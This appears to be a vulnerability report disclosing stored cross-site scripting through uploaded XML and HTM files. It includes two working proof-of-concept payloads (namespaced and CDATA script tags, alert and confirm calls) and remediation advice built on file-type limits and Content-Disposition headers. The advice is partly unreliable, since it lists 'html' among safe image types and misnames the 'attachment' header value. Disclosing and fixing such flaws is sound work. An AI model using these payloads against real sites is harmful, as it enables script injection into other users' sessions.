Description

Stored XSS can be performed by malicious XML / HTM files. There is no check in place to prevent such files from being uploaded.

Proof of Concept 1 (XML)

1: Upload the following file as payload.xml:

<html>
        <head></head>
        <body>
                <something:script xmlns:something="http://www.w3.org/1999/xhtml">alert(1)</something:script>
                <a:script xmlns:a="http://www.w3.org/1999/xhtml">alert(2)</a:script>
                <info>
                  <name>
                    <value><![CDATA[<script>confirm(document.domain)</script>]]></value>
                  </name>
                    <description>
                      <value>Hello</value>
                    </description>
                    <url>
                      <value>http://google.com</value>
                    </url>
                </info>
        </body>
</html>

Proof of Concept 2 (HTM)

2: Upload the following file as payload.htm:

<script>alert(1)</script>

Impact

This vulnerability is capable of XSS via malicious XML / HTM files

Recommended Fix

Only allow image file uploads (png / html / webp / svg [sanitize this one properly!])

If filetype restriction unallowed, I strongly suggest you opt for Content-Disposition method. As there are many dangerous file types which can be uploaded. I recommend:

• For select files ( .png, .jpg, .svg (after sanitization) .pdf, .gif ... etc):

• Use the Content-Disposition: inline header so that they can be viewed in the browser.

• If the file extension does not match a safe file type

• Use the Content-Disposition: attachments header so that they are directly downloaded to user computers instead.